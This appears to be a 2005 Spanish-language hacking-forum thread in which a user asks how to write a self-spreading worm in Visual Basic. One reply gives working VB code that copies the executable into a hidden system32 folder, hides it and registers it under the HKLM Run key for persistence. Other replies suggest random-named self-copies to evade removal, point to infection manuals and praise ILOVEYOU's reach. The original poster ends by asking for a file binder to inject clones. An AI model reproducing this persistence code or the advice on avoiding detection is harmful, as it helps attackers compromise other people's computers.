elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Gusano!!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Gusano!!  (Leído 4,793 veces)
goodbye

Desconectado Desconectado

Mensajes: 93



Ver Perfil
Gusano!!
« en: 25 Junio 2005, 08:52 am »

Señores, quien sabe como seria un ejemplo de gusano con VB. Un code que inocule nuestro .exe en otros archivos, de manera que al abrirlos posteriormente tambien vuelva a ejecutarlo.
Como harian una infeccion??  ::)


En línea

Al lado de la dificultad está la facilidad.
Cambiad de placeres, pero no cambies de amigos.
Aceptar un favor de un amigo, es hacerle otro.
programatrix


Desconectado Desconectado

Mensajes: 3.287


Ver Perfil WWW
Re: Gusano!!
« Respuesta #1 en: 25 Junio 2005, 12:10 pm »

Te voy a poner aqui un código básico para infectar un equipo con tu gusano:
Código:
Set sh = CreateObject("WScript.Shell")
Set ficheros = CreateObject("Scripting.FileSystemObject")
ficheros.CreateFolder "C:\Windows\system32\privatesystem"
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Windows\system32\privatesystem" & "\" & "virus" & ".exe"
Call SetAttr("C:\Windows\system32\privatesystem" & "\virus.EXE", vbHidden)
sh.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\private", "C:\Windows\system32\privatesystem\virus.exe"
Con esto se copia el fichero a una carpeta de system32 creada tu antes, se oculta el programa para que el usuario no lo pueda borrar o le sea mas dificil y luego se registra como aplicación de arranque en HKEY_LOCAL_MACHINE.


En línea

5v5

Desconectado Desconectado

Mensajes: 57


Ver Perfil
Re: Gusano!!
« Respuesta #2 en: 25 Junio 2005, 16:10 pm »

Hola...Tambien podrias realizar que en cazo de que cierren tu programa al ser detectado, cree una copia de si mismo con un nombre aleatorio, ademas se grave en una carpeta aleatoria, tambien que esa direccion y nombre de la copia se grave en el clave run, para que se ejecute tu copia, ya que si detectan tu .exe original lo pueden eliminar.......y asi tu gusano no muere........en este momento me encuentro un poco ocupado pero en cuento me desecupe te mando unos codes de ejemplo, bueno si es que los necesitas......espero te sirva esta idea
En línea

Pseudoroot


Desconectado Desconectado

Mensajes: 839



Ver Perfil
Re: Gusano!!
« Respuesta #3 en: 25 Junio 2005, 16:40 pm »

oues pudiste haber posteado en la sección de troyanos y virus, supongo que lo que pretendes hacer es infeccion de exes con visual basic..en www.gedzac.tk hay un manual que lo explica..
En línea

BenRu
The Prodigy


Desconectado Desconectado

Mensajes: 4.006


Ver Perfil
Re: Gusano!!
« Respuesta #4 en: 25 Junio 2005, 17:02 pm »

Yo ice uno...lomejor es vbscript...
En línea

Pseudoroot


Desconectado Desconectado

Mensajes: 839



Ver Perfil
Re: Gusano!!
« Respuesta #5 en: 25 Junio 2005, 17:06 pm »

te refieres a que vbs es mejor para infectar?..si es asi, toy de acuerdo contigo., este lenguaje tiene la propiedad de infectar muchos archivos en variados formatos,, talveez es porque es un lenguaje script..lo cierto es que se pueden hacer bastante cosas como esas en este lenguaje... :P
En línea

Slasher-K


Desconectado Desconectado

Mensajes: 1.477


Ver Perfil
Re: Gusano!!
« Respuesta #6 en: 26 Junio 2005, 00:33 am »

Una cosa es un gusano que se reproduce y otra cosa un virus que infecta archivos.

Si lo que querés es un worm puse un ejemplo hace un tiempo:

Ejemplo de Worm (gusano) en VB

Si la idea era infectar archivos ya es algo mucho más avanzado que requiere conocimientos de asm, la estructura de los archivos ejecutables, métodos de infección, entre otros.

Si conoces a fondo la estructura de los ejecutables entonces sólo es realizar pruebas. Para más información acerca de su formato mira el siguiente post:

http://foro.elhacker.net/index.php/topic,73694.msg338298.html#msg338298

Y VBS es lo peor para realizar worms, por empezar lo detectan los AVs y segundo que es lentisimo, pero eso no significa que no sirva.

Saludos.
En línea



A la reina de las profundidades que cuida los pasos de una sombra en la noche :*
Pseudoroot


Desconectado Desconectado

Mensajes: 839



Ver Perfil
Re: Gusano!!
« Respuesta #7 en: 26 Junio 2005, 00:39 am »

pues figate que en su tiempo este lenguaje tan empequeñesido como lo dejas tu,, fue el que se utilizó para programar I love you..  y me imagino que conoceras las consecuencias que trajo ..
hoy por hoy, es cierto es un lenguaje que ya no se usa para programar worm .debido a que todos querian hacer su gusano en el ,y por lo mismo ya lo detectan lo AVs...
Pero, de que permite hacer muchas cosas, lo permite y de manera bastante facil..en comparacion con lenguajes de proposito general ..
En línea

Slasher-K


Desconectado Desconectado

Mensajes: 1.477


Ver Perfil
Re: Gusano!!
« Respuesta #8 en: 26 Junio 2005, 01:10 am »

I love you fue una verdadera maravilla pero en ese entonces los AVs no lo detectaban y por eso fue tan poderoso, hoy en día no se puede hacer nada en VBS que no detecten los AVs

Saludos.
En línea



A la reina de las profundidades que cuida los pasos de una sombra en la noche :*
goodbye

Desconectado Desconectado

Mensajes: 93



Ver Perfil
Re: Gusano!!
« Respuesta #9 en: 26 Junio 2005, 05:06 am »

Muy bien!! Gracias a todos!!

Dunklerstern - Excelente la reproduccion del gusano.

[P$3ud0r00†] - No puedo ver el manual que dices, como le encuentras en ese sitio?

Del 'I Love You' no estoy seguro si en lo que se ha publicado como su fuente este virus hace una verdadera infectacion a los archivos de la pc.

Pienso que - a lo mejor sirve para infectar, hacer un juntador o binder que metiera el clon del ejecutable a todo el vecindario de archivos.

Por lo tanto, alguien tiene un code de juntador en VB que le funcione??
« Última modificación: 26 Junio 2005, 07:13 am por CrackelDestripador » En línea

Al lado de la dificultad está la facilidad.
Cambiad de placeres, pero no cambies de amigos.
Aceptar un favor de un amigo, es hacerle otro.
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Gusano redlan
Hacking
HackTeam 0 1,555 Último mensaje 13 Febrero 2011, 02:38 am
por HackTeam
gusano « 1 2 »
Análisis y Diseño de Malware
CAR3S? 11 9,475 Último mensaje 21 Febrero 2012, 23:52 pm
por m0rf
Crear un gusano en C
Análisis y Diseño de Malware
xhule 7 8,808 Último mensaje 19 Junio 2013, 19:11 pm
por Belial & Grimoire
necesito la muestra de un gusano
Análisis y Diseño de Malware
General Dmitry Vergadoski 3 2,606 Último mensaje 27 Agosto 2013, 15:41 pm
por Danyfirex
Gusano básico en C++
Programación C/C++
zikotik 7 6,240 Último mensaje 25 Octubre 2014, 02:18 am
por rir3760
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines